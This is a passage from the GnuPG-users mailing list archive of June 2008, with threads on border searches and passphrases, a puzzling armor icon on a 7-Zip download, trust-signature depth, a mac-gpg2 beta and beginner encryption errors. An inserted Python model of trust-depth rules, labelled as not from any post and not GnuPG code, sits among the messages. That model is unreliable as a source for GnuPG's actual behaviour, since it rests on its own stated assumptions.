From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 00:02:45 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856B150.4020704@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> Message-ID: <48573765.4070101@gmail.com> Rick Valenzuela wrote: > Robert J. Hansen wrote: >> it's grossly inaccurate to say that an airport >> is beyond the laws of the host country. > > I said it's "viewed as." It's an interpretation and being taken > advantage of as such. I might've tended toward hyperbole and implied an > uncivilized Wild West of airports, but for some specific instances, yes, > basic expected rights are sometimes no longer operable pre-entry. > > For instance, in the U.S., if a non-citizen is being questioned about > entry status, he or she is not entitled to have an attorney present. (A > U.S. citizen is, for any questioning.) Yet, if a noncitizen is detained > in the city, he can have a lawyer present for questioning by police. I don't have any idea how it operates in my country, I mean, how it works at the international airport. Also, there are Interpol agents there, and I am not sure how they treat jurisdiction. Anyway, I still remember when a Chilean passenger was required to put his handbag with the other luggage (this was after Sept 11, 2001), and he said something like "ok, no problem, I still have my machine-gun in my pocket" (a very stupid joke to make, in a time like that, but still it was clearly a joke... there is no way to put a machine-gun inside a pocket). And he spent several days arrested... So, IMHO, nothing that can happen inside USA regarding "security" amazes me. 
 Anyway, regarding encryption and legal issues, I think we should not focus "only" on extreme situations, without forgetting too that there are places where "weird" (or unpleasant) things can happen. From faramir.cl at gmail.com Tue Jun 17 06:37:24 2008 
From: faramir.cl at gmail.com (Faramir) Date: Tue, 17 Jun 2008 00:37:24 -0400 Subject: passphrases: the police and subkeys scenario In-Reply-To: <4856CB45.7070308@rickv.com> References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> <4856CB45.7070308@rickv.com> Message-ID: <48573F84.7030901@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Rick Valenzuela escribi?: > Robert J. Hansen wrote: > | Keeping this jurisdiction-free, the legal protections people think they > | should have and the legal protections they think they have and the legal > | protections they actually have are three quite disjoint subject areas. > | It pays to keep this in mind when making statements. > | > | My objection is not to your political beliefs or your ideas about what > | rights are possessed by Americans. My objection is strictly one of > clarity. > > > Sorry for the confusion. Clarity is good, yes, but what I was saying is > that practicality is good, too. Add to the disjointed subject areas the > legal protections that people are going to get. Those could differ > because some areas are unwritten as law or regulation, or various > interpretations of existing law have not been fully tested in court. > > I wasn't trying to push my politics. I was just highlighting that a gray > area could exist, and that this kind of interpretation is not limited to > whether a country is civilized or not. Ok, I get the point. Also, I mentioned the word "civilized" trying to not imply countries which doesn't grant the right to have an attorney's services are not civilized... that is the reason why I used the "" signs. 
Regards

From faramir.cl at gmail.com Tue Jun 17 10:34:52 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 17 Jun 2008 04:34:52 -0400
Subject: I saw this strange thing...
Message-ID: <4857772C.60301@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Today I downloaded 7z archiver, I was using firefox, and when the download window opened, I saw:

"You chose to open the file
7z457.exe
which is: GnuPG Encrypted/Signed File
from: http://ufpr.dl.sourceforge.net

Do you want to save this file?"

And the icon of the file was the green sheet with a green lock. After the download finished, I tried to "verify" it using GPGtools, but as I had expected, it couldn't verify it. So my question is, what kind of relation could that file have with gpg? It was the installer file (doubleclick, and the install process starts), so, I don't think it could be a passwordless encrypted with gpg symmetric encryption... or could it be?

Maybe my firefox just made a mistake... or not?

Regards

From wk at gnupg.org Tue Jun 17 11:30:13 2008
From: wk at gnupg.org (Werner Koch)
Date: Tue, 17 Jun 2008 11:30:13 +0200
Subject: Bug: --encrpyt-files: too many open files
In-Reply-To: <48562358.8060201@tbz-pariv.de> (Thomas Guettler's message of "Mon, 16 Jun 2008 10:24:56 +0200")
References: <48562358.8060201@tbz-pariv.de>
Message-ID: <87fxrc2yu2.fsf@wheatstone.g10code.de>

On Mon, 16 Jun 2008 10:24, hv at tbz-pariv.de said:

> Can someone check if this happens in the latest release, too?

I think this has been fixed:

  sh-3.00$ find . -type f | wc
  1558 1558 77429
  sh-3.00$ ulimit -n 30
  sh-3.00$ find . -type f | gpg2 -r alpha --encrypt-files --always-trust
  sh-3.00$ find . -type f | wc
  3116 3116 161090
  sh-3.00$ gpg2 --version
  gpg (GnuPG) 2.0.10-svn4773

Although this is my current development version I am sure that it has at least been fixed in 2.0.9.

Salam-Shalom,

Werner

--
Thoughts are free. Exceptions are regulated by a federal law.

From avi.wiki at gmail.com Tue Jun 17 16:28:21 2008
From: avi.wiki at gmail.com (Avi)
Date: Tue, 17 Jun 2008 10:28:21 -0400
Subject: Gnupg-users Digest, Vol 57, Issue 18
In-Reply-To:
References:
Message-ID: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

For what it's worth, I recall getting the gpg icon when I recently installed 7z as well.

Avi

2008/6/17 :
> ---------- Forwarded message ----------
> From: Faramir
> To: "gnupg-users at gnupg.org"
> Date: Tue, 17 Jun 2008 04:34:52 -0400
> Subject: I saw this strange thing...
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Today I downloaded 7z archiver, I was using firefox, and when the
> download windows opened, I saw:
>
> "You chose to open the file
> 7z457.exe
> which is: GnuPG Encrypted/Signed File
> from: http://ufpr.dl.sourceforge.net
>
> Do you want to save this file?"
>
> And the icon of the file was the green sheet with a green lock. After
> the download finished, I tried to "verify" it using GPGtools, but as I
> had expected, it couldn't verify it. So my question is, what kind of
> relation could that file have with gpg? It was the installer file
> (doubleclick, and the install process starts), so, I don't think it
> could be a passwordless encrypted with gpg symmetric encryption... or
> could it be?
>
> Maybe my firefox just made a mistake... or not?
>
> Regards
>

--
en:User:Avraham
----
pub 1024D/785EA229 3/6/2007 Avi (Wikipedia-related)
Primary key fingerprint: D233 20E7 0697 C3BC 4445 7D45 CBA0 3F46 785E A229

From jmoore3rd at bellsouth.net Tue Jun 17 16:47:42 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Tue, 17 Jun 2008 10:47:42 -0400
Subject: Armor Icon Associated with 7-Zip Executable
In-Reply-To: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com>
References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com>
Message-ID: <4857CE8E.7050305@bellsouth.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Avi wrote:
> For what it's worth, I recall getting the gpg icon when I
> recently installed 7z as well.

The 'armor' icon indicates that the .exe File has a companion detached Signature file. Had You also downloaded the Sig File You could have verified that the .exe File had been signed by the Author.

FWIW: When Replying to a Subject contained within a Digest it is better form to Change the Subject in the Posted Reply to indicate what the Post pertains to. This facilitates Readers in parsing those items they are interested in.

JOHN ;)
Timestamp: Tuesday 17 Jun 2008, 10:47 --400 (Eastern Daylight Time)

From rick at rickv.com Tue Jun 17 16:41:23 2008
From: rick at rickv.com (Rick Valenzuela)
Date: Tue, 17 Jun 2008 10:41:23 -0400
Subject: passphrases: the police and subkeys scenario
In-Reply-To: <48573F84.7030901@gmail.com>
References: <48502A51.5030804@rickv.com> <20080613193920.GA4107@jabberwocky.com> <4854BCE4.7080204@rickv.com> <48555FF8.8060705@gmail.com> <48569C63.2010401@rickv.com> <4856A99B.5010406@sixdemonbag.org> <4856B150.4020704@rickv.com> <4856C0F0.9070306@sixdemonbag.org> <4856CB45.7070308@rickv.com> <48573F84.7030901@gmail.com>
Message-ID: <4857CD13.4070102@rickv.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Faramir wrote:
| Ok, I get the point. Also, I mentioned the word "civilized" trying to
| not imply countries which don't grant the right to have an attorney's
| services are not civilized... that is the reason why I used the "" signs.

No worries, man, I understood you. I actually omitted from my last post "and not all border guards are the same."

cheers
Rick

- --
Rick Valenzuela
photographer | reporter
+1 267 694 3642 | www.rickv.com
GnuPG ID: 0xD5644029

From faramir.cl at gmail.com Tue Jun 17 21:09:05 2008
From: faramir.cl at gmail.com (Faramir)
Date: Tue, 17 Jun 2008 15:09:05 -0400
Subject: Armor Icon Associated with 7-Zip Executable
In-Reply-To: <4857CE8E.7050305@bellsouth.net>
References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net>
Message-ID: <48580BD1.3060900@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

John W. Moore III wrote:
> Avi wrote:
>> For what it's worth, I recall getting the gpg icon when I
>> recently installed 7z as well.
>
> The 'armor' icon indicates that the .exe File has a companion detached
> Signature file. Had You also downloaded the Sig File You could have
> verified that the .exe File had been signed by the Author.

It is very interesting... does gpg leave a 'hint' in the .exe file saying there is a detached signature file? I couldn't find a link to download the signature file anywhere, so I am puzzled about how did firefox know there is such file?

Best Regards

From jmoore3rd at bellsouth.net Tue Jun 17 21:23:06 2008
From: jmoore3rd at bellsouth.net (John W. Moore III)
Date: Tue, 17 Jun 2008 15:23:06 -0400
Subject: Armor Icon Associated with 7-Zip Executable
In-Reply-To: <48580BD1.3060900@gmail.com>
References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com>
Message-ID: <48580F1A.2050606@bellsouth.net>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Faramir wrote:
> John W. Moore III wrote:
>> Avi wrote:
>>> For what it's worth, I recall getting the gpg icon when I
>>> recently installed 7z as well.
>> The 'armor' icon indicates that the .exe File has a companion detached
>> Signature file. Had You also downloaded the Sig File You could have
>> verified that the .exe File had been signed by the Author.
>
> It is very interesting... does gpg leave a 'hint' in the .exe file
> saying there is a detached signature file? I couldn't find a link to
> download the signature file anywhere, so I am puzzled about how did
> firefox know there is such file?

Ostensibly, next to or below the Application You downloaded was a Link to Download the Signature for the file. The icon You saw was merely the indicator that the File had been Signed. The Detached Signature must be downloaded separately.
JOHN ;)
Timestamp: Tuesday 17 Jun 2008, 15:22 --400 (Eastern Daylight Time)

From benjamin at py-soft.co.uk Tue Jun 17 22:19:00 2008
From: benjamin at py-soft.co.uk (Benjamin Donnachie)
Date: Tue, 17 Jun 2008 21:19:00 +0100
Subject: mac-gpg2 v2.0.9 beta available.
Message-ID: <48581C34.1060507@py-soft.co.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

There's currently a beta package for gpg v2.0.9 on the Mac available at
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-1.zip

Signature at
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-1.zip.asc

Universal binary tested on MacOSX v10.4 and v10.5. Unzip and then run resulting install package.

Until fully integrated into the macgpg project, support available on the macgpg2 list - https://www.py-soft.co.uk/mailman/listinfo/macgpg2

Notes:

To use the OpenPGP smartcard with SSH you will need to add the line "enable-ssh-support" to ~/.gnupg/gpg-agent.conf. You then need to log out and then back in again for it to work.

If you installed mac-gpg2 by hand previously, any entry in .profile relating to source ~/.gpg-agent-info or source ~/.gnupg/.gpg-agent can be removed.

This install will overwrite the file ~/.MacOSX/environment.plist on every login. If you do not know what this means then generally you do not need to worry. If you do have one, it's fair to assume that you are capable of editing /usr/local/sbin/gpg-login.sh to add the required statements back in.

This install will NOT replace any existing Login and Logout hooks. If you have any existing hooks you will need to run the following from the command line:

  sudo defaults write com.apple.loginwindow LoginHook /usr/local/sbin/gpg-login.sh
  sudo defaults write com.apple.loginwindow LogoutHook /usr/local/sbin/gpg-logout.sh

Further refinements planned before release in order of priority:

LoginHook - only kill dead standard sockets if gpg-agent set to use standard sockets.

Install script - produce error message if Login/out scripts already exist and not mac-gpg2. Alternatively, replace any hooks but ensure message displayed/warning given.

Overall - improve install experience and package as dmg.

LoginHook - add facility for optional file to contain additional environment.plist statements to avoid editing of scripts.

LoginHook - remove requirement for environment file and use output from gpg-agent instead.

Ben

From george.davidescu at gmail.com Tue Jun 17 23:09:06 2008
From: george.davidescu at gmail.com (bezna)
Date: Tue, 17 Jun 2008 14:09:06 -0700 (PDT)
Subject: Questions about trust signatures
In-Reply-To: <20080616210212.GB14148@jabberwocky.com>
References: <17789248.post@talk.nabble.com> <20080613214255.GD4107@jabberwocky.com> <17872484.post@talk.nabble.com> <20080616210212.GB14148@jabberwocky.com>
Message-ID: <17937638.post@talk.nabble.com>

Hi,

I think I made a small error in my last post, and I want to alleviate any confusion. I made the following statement:

"The next hop in the chain will have an appropriate trust value of "undefined", and the one following it will simply be "unknown"."

This is somewhat incorrect. In the case where Bob issues a tsign with a depth greater than the one issued to him by Alice, the next link in the chain (Charlie) will appear as valid to Alice but his trust will be "undefined". David, who was tsigned by Charlie, will then appear to Alice with a validity of "undefined" and a trust of "undefined". Finally, Elena, who was signed normally (tsign of 0) by Charlie, will have a validity of "unknown" and a trust of "unknown".

This all makes sense to me semantically but I just wanted to clarify so people don't get confused by my last post.

George


David Shaw wrote:
>
> On Mon, Jun 16, 2008 at 01:14:52PM -0700, bezna wrote:
>>
>> Dear David,
>>
>> First, thank you for your reply and for the working link to the white paper.
>> You have my enormous gratitude for taking the time to share your knowledge
>> with me.
>>
>>
>> David Shaw wrote:
>> >
>> >> Furthermore, if Bob tsigned Carmen with a depth of 4 (for his own
>> >> purposes), the chain of trust linking Eve to Alice would be broken
>> >> since GPG computes certificate validity (and trust in the case of
>> >> tsigns) only down paths where each next node in the path was tsigned
>> >> with a lower "depth" than the "depth" of the tsign on the
>> >> node before it.
>> >
>> > The chain isn't broken, the depth at each step is just lowered to
>> > match the perspective of the head of the chain (Alice in this case).
>> > If Bob tsigns Carmen, then from Bob's perspective, that chain in the
>> > link had a depth of 4. Similarly, if Roger signs Bob's key with a
>> > depth of 5, then we have a new chain from Roger's perspective where
>> > the Bob->Carmen link also has a depth of 4. If Roger signed Bob's key
>> > with a depth of 4, then the Bob->Carmen link has a depth of 3 (as it
>> > is lowered to match the maximum depth granted by Roger). If Roger
>> > signed Bob's key with a depth of 50, then the Bob->Carmen link has a
>> > depth of 4 (as it can't be larger than what Bob granted).
>> >
>>
>> I believe you might be mistaken on this point. I ran some trials and it
>> seems that if the next trust signature in the chain has a higher depth than
>> the one preceding it, it is treated just as a regular signature (depth 0)
>> and the trust data contained in the signature is discarded, effectively
>> breaking the chain. The next hop in the chain will have an appropriate trust
>> value of "undefined", and the one following it will simply be "unknown". See
>> for yourself:
>
> Interesting. I'm going to have to go back to my notes from when I
> wrote that code back in 2002, and see what I was shooting for. My
> memory is that I wanted the trust depth to automatically degrade as
> the chain continued. It's possible this is just a bug, or it is
> possible I did it this way on purpose (PGP compatibility, maybe?)
>
> I'll let you know what I find.
>
> David
>
> _______________________________________________
> Gnupg-users mailing list
> Gnupg-users at gnupg.org
> http://lists.gnupg.org/mailman/listinfo/gnupg-users
>
>

--
View this message in context: http://www.nabble.com/Questions-about-trust-signatures-tp17789248p17937638.html
Sent from the GnuPG - User mailing list archive at Nabble.com.
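
The two depth rules discussed in the message above, as an added example that is not part of any post and is not GnuPG's trustdb code: a small Python model of the clamping David Shaw describes and of the behaviour George reports from his trials. All function names are hypothetical, the sample chain is constructed, and where the thread is silent (a later tsign of equal or lower depth under George's observation) the model assumes the same clamping as David's rule.

```python
"""Model of the two trust-signature depth rules described in this thread.

Illustrates the posters' descriptions only; it is not GnuPG's trustdb code.
A chain is the list of tsign depths along one path, starting with the
signature issued by the head of the chain (for example Alice -> Bob).
"""
from typing import Dict, List, Optional, Tuple


def _validate(chain: List[int]) -> None:
    if any(depth < 0 for depth in chain):
        raise ValueError("trust depth cannot be negative")


def depths_as_described_by_david(chain: List[int]) -> List[int]:
    """Effective depth of each link as seen by the head of the chain.

    Each link is lowered to what the head still allows (one less than the
    effective depth of the link before it) and is never larger than what
    the signer of that link actually granted.
    """
    _validate(chain)
    effective: List[int] = []
    remaining: Optional[int] = None  # the head's own tsign is taken as issued
    for granted in chain:
        depth = granted if remaining is None else min(granted, remaining)
        effective.append(depth)
        remaining = max(depth - 1, 0)
    return effective


def depths_as_observed_by_george(chain: List[int]) -> List[int]:
    """Effective depths under the behaviour George reports.

    A tsign whose depth is higher than the one preceding it is treated as a
    regular signature (depth 0). Assumption: every other link is clamped as
    in depths_as_described_by_david, since the thread does not say.
    """
    _validate(chain)
    effective: List[int] = []
    remaining: Optional[int] = None
    previous_granted: Optional[int] = None
    for granted in chain:
        if previous_granted is not None and granted > previous_granted:
            depth = 0  # trust data discarded, ordinary signature only
        elif remaining is None:
            depth = granted
        else:
            depth = min(granted, remaining)
        effective.append(depth)
        remaining = max(depth - 1, 0)
        previous_granted = granted
    return effective


def view_from_head(names: List[str], effective: List[int]) -> Dict[str, Tuple[bool, bool]]:
    """Map each certified key to (is_valid, is_trusted_introducer).

    names[i] is the key certified by link i. Simplifications (assumptions):
    a single path, every tsign carries full trust, no regexp restriction.
    A key is valid when its signer is the head or a trusted introducer. It is
    a trusted introducer when it is valid and its link keeps depth >= 1;
    depth 0 means an ordinary signature (RFC 4880, section 5.2.3.13).
    """
    view: Dict[str, Tuple[bool, bool]] = {}
    signer_trusted = True  # the head of the chain trusts its own key
    for name, depth in zip(names, effective):
        valid = signer_trusted
        introducer = valid and depth >= 1
        view[name] = (valid, introducer)
        signer_trusted = introducer
    return view


if __name__ == "__main__":
    # Constructed chain: Alice tsigns Bob with depth 2, Bob tsigns Charlie
    # with the higher depth 3, Charlie tsigns David with depth 1.
    names = ["Bob", "Charlie", "David"]
    chain = [2, 3, 1]
    for label, rule in (("David's description", depths_as_described_by_david),
                        ("George's observation", depths_as_observed_by_george)):
        depths = rule(chain)
        print(label, depths, view_from_head(names, depths))
```

With the constructed chain, the two rules disagree from Charlie onwards: under the described clamping Charlie remains an introducer and David's key is valid, while under the reported behaviour Charlie is valid but carries no trust and David's key is not valid, which matches the corrected account in the post.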
From avi.wiki at gmail.com Wed Jun 18 01:39:44 2008
From: avi.wiki at gmail.com (Avi)
Date: Tue, 17 Jun 2008 19:39:44 -0400
Subject: Subject: I saw this strange thing...
Message-ID: <27ee9bfb0806171639ic1837edha25d57f3a0ebb386@mail.gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

Sorry. I try to, but gmail's web interface hides the subject of a reply as the default, and I do forget.

Thanks,

- --Avi

2008/6/17 :
> --------- Forwarded message ----------
> From: "John W. Moore III"
> To: #3GnuPG Users List
> Date: Tue, 17 Jun 2008 10:47:42 -0400
> Subject: Re: Armor Icon Associated with 7-Zip Executable
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> Avi wrote:
> > For what its worth, I recall getting the gpg icon when I
> > recently installed 7z as well.
>
> The 'armor' icon indicates that the .exe File has a companion detached
> Signature file. Had You also downloaded the Sig File You could have
> verified that the .exe File had been signed by the Author.
>
> FWIW: When Replying to a Subject contained within a Digest it is better
> form to Change the Subject in the Posted Reply to indicate what the Post
> pertains to. This facilitates Readers in parsing those items they are
> interested in.
>
> JOHN ;)
> Timestamp: Tuesday 17 Jun 2008, 10:47 --400 (Eastern Daylight Time)
>

--
en:User:Avraham
----
pub 1024D/785EA229 3/6/2007 Avi (Wikipedia-related)
Primary key fingerprint: D233 20E7 0697 C3BC 4445 7D45 CBA0 3F46 785E A229

From kurtc1972 at gmail.com Wed Jun 18 03:55:04 2008
From: kurtc1972 at gmail.com (kurt c)
Date: Tue, 17 Jun 2008 18:55:04 -0700
Subject: key-export protocol
Message-ID: <7a26d9ab0806171855n1d32d68aued307f737dd8ca6e@mail.gmail.com>

Hello everyone. I'm new and this is my first post. Please excuse me for my dumb question.

My question is: I was trying to export my public key to keyservers with my GPA. The dialogue box said it will export to hkp:// random.sks.keyserver.penguin.de. But when I clicked okay a pop-up appeared which said: "there is no plug-in available for the keyserver protocol you specified."

What does it mean? What plug-in do I need? Why?

Thank you everyone.

From benjamin at py-soft.co.uk Wed Jun 18 05:44:59 2008
From: benjamin at py-soft.co.uk (Benjamin Donnachie)
Date: Wed, 18 Jun 2008 04:44:59 +0100
Subject: mac-gpg2 v2.0.9 beta available.
In-Reply-To: <48581C34.1060507@py-soft.co.uk>
References: <48581C34.1060507@py-soft.co.uk>
Message-ID: <485884BB.4050001@py-soft.co.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Benjamin Donnachie wrote:
| There's currently a beta package for gpg v2.0.9 on the Mac available at

Slight bug fix whereby ~/.MacOSX/ was not created if missing:
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-2.zip

Signature at
http://www.py-soft.co.uk/~benjamin/download/mac-gpg/mac-gnupg-2.0.9-TESTB-2.zip.asc

| To use the OpenPGP smartcard with SSH you will need to add the line
| "enable-ssh-support" to ~/.gnupg/gpg-agent.conf You then need to log
| out and then back in again for it to work.

| If you installed mac-gpg2 by hand previously, any entry in .profile
| relating to source ~/.gpg-agent-info or source ~/.gnupg/.gpg-agent can
| be removed.

| This install will overwrite the file ~/.MacOSX/environment.plist on
| every login. If you do not know what this means then generally you do
| not need to worry. If you do have one, it's fair to assume that you are
| capable of editing /usr/local/sbin/gpg-login.sh to add the required
| statements back in.

See below - additional statements can now be added to the file ~/.MacOSX/environment.plist.footer

| This install will NOT replace and existing Login and Logout hooks. If
| you have any existing hooks you will need to run the following from the
| command line:

This install now replaces any existing Login and Logout hooks. A future release may preserve existing hooks.

| Further refinements planned before release in order of priority:

| LoginHook - only kill dead standard sockets if gpg-agent set to use
| standard sockets.

Done.

| Overall - improve install experience and package as dmg.

Awaits formal release.

| LoginHook - add facility for optional file to contain additional
| environment.plist statements to avoid editing of scripts.

Done - add any additional items to the file ~/.MacOSX/environment.plist.footer in the format:

name value

| LoginHook - remove requirement for environment file and use output from
| gpg-agent instead.

.gpg-agent-info is used by other programs, such as GPGMail, and therefore will remain.

Ben

From elmer.espinosa at gmail.com Wed Jun 18 05:02:18 2008
From: elmer.espinosa at gmail.com (Elmer Espinosa)
Date: Wed, 18 Jun 2008 11:02:18 +0800
Subject: error on ecrypting file
Message-ID: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com>

Hi to all,

I generate key using a command gpg --gen-key. Then after that I want to encrypt a file I used a command gpg -e file
I got a message " Enter the user id. End with the empty line:" when I enter the user id that I put during key generation it ask me again to "Enter the user id. End with the empty line"
And the file is not encrypted.

Is there missing in my command.

Thanks,
Elmer

From email at sven-radde.de Wed Jun 18 06:41:03 2008
From: email at sven-radde.de (Sven Radde)
Date: Wed, 18 Jun 2008 06:41:03 +0200
Subject: Armor Icon Associated with 7-Zip Executable
In-Reply-To: <48580F1A.2050606@bellsouth.net>
References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com> <48580F1A.2050606@bellsouth.net>
Message-ID: <1213764063.6671.9.camel@carbon>

Hi!

On Tuesday, 17.06.2008, at 15:23 -0400, John W. Moore III wrote:
> Ostensibly, next to or below the Application You downloaded was a Link
> to Download the Signature for the file.

When looking at 7-zip.org and their Sourceforge site, I did not find anything like a separate detached signature for download and downloading the .exe was absolutely "normal".

> The icon You saw was merely the
> indicator that the File had been Signed.

It is not possible to determine whether a detached signature exists by merely looking at the original file.

cu, Sven

From aongenae at gmail.com Wed Jun 18 08:20:03 2008
From: aongenae at gmail.com (Arnaud Ongenae)
Date: Wed, 18 Jun 2008 08:20:03 +0200
Subject: error on ecrypting file
In-Reply-To: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com>
References: <78f71be20806172002y78d89c9w52406e0506336484@mail.gmail.com>
Message-ID: <83713a650806172320p666719efy60688635a3f02e7d@mail.gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The idea is that gpg allows to encrypt the file for several persons, so it asks you all the receivers... simply hit the key to end and it will encrypt the message.

(user id is everything that can differentiate the key you want to use amongst every key you own (can be the id, email, name, ...)

note if you encrypt the file with your public key, you will be the only one to be able to decrypt it.

_-Arnaud-_

2008/6/18 Elmer Espinosa :
> Hi to all,
>
> I generate key using a command gpg --gen-key. Then after that I want to
> encrypt a file I used a command gpg -e file
> I got a message " Enter the user id. End with the empty line:" when I
> enter the user id that I put during key generation it ask me again to "Enter
> the user id. End with the empty line"
> And the file is not encrypted.
>
> Is there missing in my command.
>
> Thanks,
> Elmer
>

From naomiza at hotmail.com Tue Jun 17 17:12:58 2008
From: naomiza at hotmail.com (NNZZ)
Date: Tue, 17 Jun 2008 08:12:58 -0700 (PDT)
Subject: Encryption failed in one command but succeeded in another...
Message-ID: <17914321.post@talk.nabble.com>

Hi there,

I am trying to encrypt and I am using two different calls. One is successful and the other one fails. I need to perform the encryption via c# code and therefore I need the one that fails to work:

This attempt to encrypt failed:

  C:\Program Files\GNU\GnuPG>gpg --homedir "C:\Program Files\GNU\GnuPG" --yes --batch --encrypt --armor --recipient MyUserId --no-verbose
  gpg: tailgate: skipped: public key not found
  gpg: [stdin]: encryption failed: public key not found

HOWEVER

The following call succeeded:

  C:\Program Files\GNU\GnuPG>gpg -e -r MyUserId Enc\ToEnc.txt

In addition I can see the key of MyUserId when I list the keys (using --list-keys) and I did sign the key so I am not really sure why the first attempt fails..

HELP!!!

Thanks :)
N

--
View this message in context: http://www.nabble.com/Encryption-failed-in-one-command-but-succeeded-in-another...-tp17914321p17914321.html
Sent from the GnuPG - User mailing list archive at Nabble.com.

From larry_seabrook at yahoo.com Wed Jun 18 01:08:49 2008
From: larry_seabrook at yahoo.com (Larry Seabrook)
Date: Tue, 17 Jun 2008 16:08:49 -0700 (PDT)
Subject: Gpg4Win: Setting TEXTMODE On ?
Message-ID: <987213.7650.qm@web31003.mail.mud.yahoo.com>

Hello,

We are using the Gpg4Win product for encrypting files.

The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only.

When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost.

I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option.

QUESTION: WILL Gpg4Win RECOGNIZE A PGP.CONF FILE CONTAINING "TEXTMODE=ON"?

(Please do a "Reply All" so that my work address is copied).

Thanks,

Larry

From faramir.cl at gmail.com Wed Jun 18 13:05:29 2008
From: faramir.cl at gmail.com (Faramir) Date: Wed, 18 Jun 2008 07:05:29 -0400 Subject: Armor Icon Associated with 7-Zip Executable In-Reply-To: <1213764063.6671.9.camel@carbon> References: <27ee9bfb0806170728l23716bfay8d9cbed483c41343@mail.gmail.com> <4857CE8E.7050305@bellsouth.net> <48580BD1.3060900@gmail.com> <48580F1A.2050606@bellsouth.net> <1213764063.6671.9.camel@carbon> Message-ID: <4858EBF9.4030200@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Sven Radde escribi?: > Am Dienstag, den 17.06.2008, 15:23 -0400 schrieb John W. Moore III: >> Ostensibly, next to or below the Application You downloaded was a Link >> to Download the Signature for the file. > > ?When looking at 7-zip.org and their Sourceforge site, I did not find > anything like a separate detached signature for download and downloading > the .exe was absolutely "normal". I didn't find the signature file too. But I returned to the download site, and tried again. With Firefox, there was the armored icon. With IE7, it was a normal file. Well, that is why I said it was a weird thing. But I am not the only one who saw that icon, so, I figure there should be an explanation... >> The icon You saw was merely the >> indicator that the File had been Signed. > > It is not possible to determine whether a detached signature exists by > merely looking at the original file. If that is true, then we are still looking for an explanation... 
Anyway, it is not like I won't be able to sleep thinking about the subject...(lol) Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org -----END PGP SIGNATURE----- From larry_seabrook at yamaha-motor.com Wed Jun 18 18:03:42 2008 From: larry_seabrook at yamaha-motor.com (Larry Seabrook) Date: Wed, 18 Jun 2008 09:03:42 -0700 Subject: TEXTMODE Option in Gpg4Win ? Message-ID: Hello, We are using the Gpg4Win product for encrypting files. The files we are encrypting and sending are text files with carriage-return and linefeed characters at the end of each line (record). The receiver of these files needs the CR and LF characters preserved by the encryption-decryption process. The files contain valid text data only. When the file is decrypted by the receiver using another PGP-compliant product, the CR and LF characters are lost. I BELIEVE we need to use the TEXTMODE=ON option when encrypting the file but the GUI for Gpg4Win does not reference this option, nor can I find any reference to a Configuration File in the Gpg4Win GUI or documentation. QUESTION: How is TEXTMODE=ON or its equivalent set when using Gpg4Win? Thanks, Larry -------------- next part -------------- An HTML attachment was scrubbed... URL: From clive.hunt at gmail.com Wed Jun 18 15:22:17 2008 
